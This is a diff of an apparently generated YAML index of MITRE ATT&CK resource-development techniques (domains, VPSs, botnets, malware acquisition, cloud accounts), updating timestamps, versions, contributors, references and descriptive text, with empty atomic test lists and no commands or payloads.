         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -52572,8 +53250,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -52612,7 +53288,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -52633,8 +53309,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -52664,7 +53338,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -52701,8 +53375,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -52724,7 +53396,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52746,8 +53418,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -52784,7 +53454,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -52806,8 +53476,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -52869,7 +53537,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -52891,7 +53558,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52909,8 +53576,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -52945,7 +53610,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52964,33 +53629,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -53000,10 +53663,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -53011,9 +53683,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -53064,11 +53735,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -53081,7 +53751,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -53116,22 +53786,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -53152,7 +53825,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -53191,6 +53864,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -53246,7 +53923,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -53304,7 +53980,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -53384,7 +54059,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -53444,7 +54118,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -53466,7 +54139,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -53485,42 +54158,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -53529,22 +54170,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -53558,7 +54230,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -53645,11 +54317,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -53709,7 +54380,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -53751,7 +54421,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53766,7 +54436,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -53857,11 +54526,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -53894,15 +54562,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -53986,7 +54655,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -54040,7 +54708,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -54091,36 +54758,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
